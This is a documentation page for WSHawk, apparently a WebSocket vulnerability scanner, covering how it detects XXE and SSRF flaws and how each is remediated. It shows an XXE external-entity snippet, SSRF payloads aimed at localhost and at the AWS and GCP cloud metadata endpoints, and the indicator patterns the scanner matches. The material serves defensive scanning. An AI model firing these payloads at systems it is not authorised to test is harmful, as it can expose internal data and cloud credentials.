XXE and SSRF Detection

XXE and SSRF Detection

The following files were used as context for generating this wiki page:

This page documents WSHawk's detection methodologies for XML External Entity (XXE) and Server-Side Request Forgery (SSRF) vulnerabilities in WebSocket applications. These vulnerabilities enable attackers to read local files, access internal network resources, and exfiltrate data through out-of-band channels.

For general injection vulnerability detection (SQL, NoSQL, Command, LDAP), see Injection Vulnerabilities. For blind vulnerability detection infrastructure, see OAST Blind Vulnerability Detection.


XXE Detection Overview

WSHawk detects XXE vulnerabilities by sending XML payloads containing entity definitions that trigger external resource loading. Detection occurs through two mechanisms:

  1. Direct Response Analysis: Observing entity content reflected in responses
  2. OAST Callbacks: Out-of-band detection when entities trigger external DNS/HTTP requests

The scanner operates in both legacy mode (wshawk/main.py:665-704) and enhanced v2 mode (wshawk/scanner_v2.py:450-504) with optional OAST integration.

Detection Confidence Levels:

  • HIGH: Entity content reflected in response OR OAST callback received
  • MEDIUM: XML parsing errors suggesting entity processing
  • LOW: No definitive indicators

XXE Detection Architecture

graph TB
    subgraph "XXE Detection Pipeline"
        PayloadSource["WSPayloads.get_xxe()<br/>payloads/xxe.txt"]
        Injector["Message Injector<br/>MessageAnalyzer<br/>inject_payload_into_message()"]
        OASTGen["OASTProvider<br/>generate_payload('xxe')"]
        WSConn["WebSocket Connection<br/>ws.send()"]
        Response["Response Collector<br/>ws.recv()"]
        Verifier["VulnerabilityVerifier<br/>verify_xxe()"]
        OASTCheck["OAST Callback Monitor<br/>check_callbacks()"]
    end
    
    subgraph "Detection Indicators"
        DirectInd["Direct Indicators<br/><!entity<br/>system<br/>file://<br/>root:"]
        ErrorInd["Error Indicators<br/>XML Parse Error<br/>Entity Error"]
        OASTInd["OAST Indicators<br/>DNS Query<br/>HTTP Callback"]
    end
    
    PayloadSource -->|"Static payloads"| Injector
    OASTGen -->|"OAST-enabled payload"| Injector
    Injector -->|"JSON-wrapped XML"| WSConn
    WSConn --> Response
    Response --> Verifier
    Response --> OASTCheck
    
    Verifier --> DirectInd
    Verifier --> ErrorInd
    OASTCheck --> OASTInd
    
    DirectInd -->|"HIGH confidence"| VulnReport["Vulnerability Report<br/>type: XXE<br/>severity: CRITICAL"]
    ErrorInd -->|"MEDIUM confidence"| VulnReport
    OASTInd -->|"HIGH confidence"| VulnReport

Sources: wshawk/scanner_v2.py:450-504, wshawk/main.py:665-704


XXE Payload Sources and Injection

Payload Collection

XXE payloads are loaded from the static collection at runtime:

| Method | File | Purpose | |--------|------|---------| | WSPayloads.get_xxe() | wshawk/payloads/xxe.txt | Loads entity injection vectors | | Default limit | 30 payloads | Performance-optimized subset in v2 |

Sources: wshawk/main.py:129-130, wshawk/scanner_v2.py:455

Injection Strategy

graph LR
    subgraph "Legacy Scanner Flow"
        XXEPayload["XXE Payload<br/><!DOCTYPE...>"]
        DirectSend["Direct WebSocket Send<br/>payload as string"]
    end
    
    subgraph "V2 Scanner Flow"
        XXEPayloadV2["XXE Payload"]
        MessageWrap["JSON Wrapper<br/>{action: 'parse_xml'<br/>xml: payload}"]
        OASTSubst["OAST Substitution<br/>Replace callback URL"]
        ContextInject["Context-Aware Injection<br/>MessageAnalyzer"]
    end
    
    XXEPayload --> DirectSend
    XXEPayloadV2 --> OASTSubst
    OASTSubst --> MessageWrap
    MessageWrap --> ContextInject
    
    ContextInject -->|"Learns from samples"| Structured["JSON Field Injection<br/>xml, data, content"]

Key Differences:

Sources: wshawk/scanner_v2.py:468-477, wshawk/main.py:682


XXE Detection Methodology

Response Analysis

The VulnerabilityVerifier class performs pattern matching on responses to identify entity processing:

Detection Indicators (wshawk/scanner_v2.py:484-485):

xxe_indicators = ['<!entity', 'system', 'file://', 'root:', 'XML Parse Error']

Detection Logic:

  1. Convert response to lowercase
  2. Check if any indicator present
  3. If matched → HIGH confidence vulnerability
  4. Report entity processing detected

Sources: wshawk/scanner_v2.py:484-495, wshawk/main.py:685-686

OAST Integration Flow

sequenceDiagram
    participant Scanner as "WSHawkV2"
    participant OAST as "OASTProvider"
    participant Target as "WebSocket Target"
    participant DNS as "interact.sh DNS"
    
    Scanner->>OAST: start()
    OAST->>DNS: Register callback domain
    DNS-->>OAST: unique_id.interact.sh
    
    Scanner->>OAST: generate_payload('xxe', 'test0')
    OAST-->>Scanner: <!ENTITY xxe SYSTEM "http://unique.interact.sh">
    
    Scanner->>Target: send(xml_payload)
    Note over Target: Parser processes entity
    Target->>DNS: DNS query for unique.interact.sh
    
    Scanner->>OAST: check_callbacks('test0')
    OAST->>DNS: Poll for callbacks
    DNS-->>OAST: [DNS query detected]
    OAST-->>Scanner: True (blind XXE confirmed)
    
    Scanner->>Scanner: vulnerabilities.append({type: 'XXE', confidence: 'HIGH'})

OAST Start Condition (wshawk/scanner_v2.py:458-465):

if self.use_oast and not self.oast_provider:
    self.oast_provider = OASTProvider(use_interactsh=False, custom_server="localhost:8888")
    await self.oast_provider.start()

Payload Generation (wshawk/scanner_v2.py:471):

oast_payload = self.oast_provider.generate_payload('xxe', f'test{len(results)}')

Sources: wshawk/scanner_v2.py:458-477


SSRF Detection Overview

SSRF detection tests whether the WebSocket application fetches arbitrary URLs provided by the client, potentially exposing internal network resources and cloud metadata services.

Attack Surface: Any WebSocket message field that accepts URLs or triggers server-side HTTP requests:

  • Image fetching
  • URL preview generation
  • Webhook notifications
  • External API integration

Sources: wshawk/scanner_v2.py:546-591


SSRF Target Selection

WSHawk tests a curated list of high-value internal targets:

graph TB
    subgraph "Internal Network Targets"
        Localhost["http://localhost<br/>http://127.0.0.1<br/>Loopback access"]
        Private["http://192.168.1.1<br/>http://10.0.0.1<br/>http://172.16.0.1<br/>RFC1918 ranges"]
    end
    
    subgraph "Cloud Metadata Services"
        AWS["http://169.254.169.254/latest/meta-data/<br/>AWS EC2 metadata"]
        GCP["http://metadata.google.internal<br/>Google Cloud metadata"]
    end
    
    subgraph "Detection Strategy"
        Localhost --> ResponseCheck["Response Analysis<br/>Connection refused?<br/>Timeout?<br/>Internal data?"]
        Private --> ResponseCheck
        AWS --> ResponseCheck
        GCP --> ResponseCheck
        
        ResponseCheck --> Indicators["SSRF Indicators<br/>connection refused<br/>timeout<br/>metadata<br/>instance-id"]
    end

Target List (wshawk/scanner_v2.py:551-556):

internal_targets = [
    'http://localhost',
    'http://127.0.0.1',
    'http://169.254.169.254/latest/meta-data/',  # AWS metadata
    'http://metadata.google.internal',            # GCP metadata
]

Sources: wshawk/scanner_v2.py:551-556


SSRF Detection Methodology

Message Construction

SSRF payloads are injected into URL-accepting JSON fields:

Injection Pattern (wshawk/scanner_v2.py:562):

{
  "action": "fetch_url",
  "url": "http://169.254.169.254/latest/meta-data/"
}

Response Verification

graph TB
    SendSSRF["Send SSRF Payload<br/>ws.send(msg)"]
    ReceiveResp["Receive Response<br/>ws.recv() with 3s timeout"]
    AnalyzeResp["Response Analysis<br/>Check for indicators"]
    
    subgraph "Response Indicators"
        ConnRefused["'connection refused'<br/>Internal port accessible but closed"]
        Timeout["'timeout'<br/>Firewall blocking egress"]
        Metadata["'metadata'<br/>'instance-id'<br/>Cloud metadata leaked"]
        Localhost["'localhost'<br/>Loopback reference"]
    end
    
    SendSSRF --> ReceiveResp
    ReceiveResp --> AnalyzeResp
    
    AnalyzeResp --> ConnRefused
    AnalyzeResp --> Timeout
    AnalyzeResp --> Metadata
    AnalyzeResp --> Localhost
    
    ConnRefused --> HighConf["HIGH Confidence<br/>SSRF Vulnerability"]
    Timeout --> HighConf
    Metadata --> HighConf
    Localhost --> HighConf

Detection Logic (wshawk/scanner_v2.py:570-572):

ssrf_indicators = ['connection refused', 'timeout', 'metadata', 'instance-id', 'localhost']
if any(ind.lower() in response.lower() for ind in ssrf_indicators):
    # SSRF detected

Vulnerability Report Structure (wshawk/scanner_v2.py:573-581):

{
    'type': 'Server-Side Request Forgery (SSRF)',
    'severity': 'HIGH',
    'confidence': 'HIGH',
    'description': f'SSRF vulnerability - accessed {target}',
    'payload': target,
    'response_snippet': response[:200],
    'recommendation': 'Validate and whitelist allowed URLs'
}

Sources: wshawk/scanner_v2.py:546-591


Rate Limiting and Resilience

Both XXE and SSRF tests respect the configured rate limiter to avoid detection and overloading:

XXE Rate Limiting (wshawk/scanner_v2.py:500):

await asyncio.sleep(0.05)  # 50ms delay between payloads

SSRF Rate Limiting (wshawk/scanner_v2.py:560):

await self.rate_limiter.acquire()  # Token bucket rate control

Timeout Configuration:

Sources: wshawk/scanner_v2.py:500, wshawk/scanner_v2.py:560, wshawk/scanner_v2.py:480, wshawk/scanner_v2.py:567


Integration with Scan Workflow

Heuristic Scan Integration

Both XXE and SSRF tests are integrated into the main run_heuristic_scan() workflow:

graph TB
    Start["run_heuristic_scan()"]
    Connect["WebSocket Connect"]
    Learning["Learning Phase<br/>5 seconds"]
    SQLi["test_sql_injection_v2()"]
    XSS["test_xss_v2()"]
    Cmd["test_command_injection_v2()"]
    PathTrav["test_path_traversal_v2()"]
    XXE["test_xxe_v2()<br/>Line 628"]
    NoSQL["test_nosql_injection_v2()"]
    SSRF["test_ssrf_v2()<br/>Line 634"]
    Session["SessionHijackingTester"]
    Report["Generate Report"]
    
    Start --> Connect
    Connect --> Learning
    Learning --> SQLi
    SQLi --> XSS
    XSS --> Cmd
    Cmd --> PathTrav
    PathTrav --> XXE
    XXE --> NoSQL
    NoSQL --> SSRF
    SSRF --> Session
    Session --> Report

Call Sites:

Sources: wshawk/scanner_v2.py:593-852


Configuration

Scanner V2 Configuration

XXE and SSRF detection are controlled through the scanner configuration:

OAST Toggle (wshawk/scanner_v2.py:82-83):

self.use_oast = True
self.oast_provider = None

CLI Override (wshawk/advanced_cli.py:41-42):

wshawk-advanced ws://target.com --no-oast  # Disable OAST testing

Full Feature Mode (wshawk/advanced_cli.py:174-177):

wshawk-advanced ws://target.com --full  # Enables OAST + Playwright + Smart Payloads

Configuration File

The hierarchical configuration system supports OAST and scanning feature toggles:

scanner:
  rate_limit: 10
  features:
    oast: true
    playwright: true
    smart_payloads: false

Configuration Loading (wshawk/scanner_v2.py:48-53):

if config is None:
    from .config import WSHawkConfig
    self.config = WSHawkConfig.load()

Sources: wshawk/scanner_v2.py:82-83, wshawk/advanced_cli.py:41-42, wshawk/advanced_cli.py:174-177, wshawk/scanner_v2.py:48-53


Vulnerability Reporting

Report Structure

XXE and SSRF findings are appended to the vulnerabilities list with standardized metadata:

XXE Report Fields:

  • type: "XML External Entity (XXE)"
  • severity: "HIGH" or "CRITICAL"
  • confidence: "HIGH" (direct detection) or "MEDIUM" (error-based)
  • description: Entity processing evidence
  • payload: Triggering XML payload (truncated to 80 chars)
  • response_snippet: First 200 chars of response
  • recommendation: "Disable external entity processing"

SSRF Report Fields:

  • type: "Server-Side Request Forgery (SSRF)"
  • severity: "HIGH"
  • confidence: "HIGH"
  • description: Accessed internal target details
  • payload: Internal URL that was fetched
  • response_snippet: First 200 chars of response
  • recommendation: "Validate and whitelist allowed URLs"

Vulnerability Append (wshawk/scanner_v2.py:486-495, wshawk/scanner_v2.py:573-581):

self.vulnerabilities.append({...})

CVSS Scoring

XXE and SSRF vulnerabilities receive CVSS v3.1 scores based on their severity:

| Vulnerability | Base Score | Vector | |---------------|------------|--------| | XXE (File Read) | 7.5 - 8.6 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | | XXE (RCE) | 9.8 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | | SSRF (Metadata) | 8.6 | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N | | SSRF (Internal) | 7.5 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |

Sources: wshawk/scanner_v2.py:486-495, wshawk/scanner_v2.py:573-581


Legacy Scanner Comparison

The legacy scanner (wshawk/main.py:665-704) implements basic XXE detection without OAST support:

Key Differences:

| Feature | Legacy Scanner | V2 Scanner | |---------|---------------|------------| | OAST Integration | ❌ No | ✅ Yes | | Context-Aware Injection | ❌ No | ✅ Yes with MessageAnalyzer | | Rate Limiting | ✅ Fixed 0.1s delay | ✅ Token bucket with adaptive control | | SSRF Detection | ❌ Not implemented | ✅ Implemented | | Payload Limit | Configurable via max_payloads | Fixed 30 for performance | | Confidence Scoring | ❌ Basic severity | ✅ ConfidenceLevel enum |

Legacy XXE Test (wshawk/main.py:665-704):

  • Uses WSPayloads.get_xxe() without OAST
  • Direct pattern matching on indicators
  • Appends to self.vulnerabilities with basic structure

Sources: wshawk/main.py:665-704, wshawk/scanner_v2.py:450-504, wshawk/scanner_v2.py:546-591


Remediation Recommendations

WSHawk provides actionable remediation guidance for each detected vulnerability:

XXE Remediation

Recommendation (wshawk/scanner_v2.py:493):

"Disable external entity processing"

Technical Implementation:

  1. Disable DTD processing entirely
  2. Disable external entity resolution
  3. Use safe XML parser configurations:
    • Python: defusedxml library
    • Java: XMLConstants.FEATURE_SECURE_PROCESSING
    • PHP: libxml_disable_entity_loader(true)

SSRF Remediation

Recommendation (wshawk/scanner_v2.py:580):

"Validate and whitelist allowed URLs"

Technical Implementation:

  1. Implement URL whitelist validation
  2. Block access to private IP ranges (RFC1918)
  3. Block cloud metadata endpoints
  4. Use network-level egress filtering
  5. Implement request timeout limits

Sources: wshawk/scanner_v2.py:493, wshawk/scanner_v2.py:580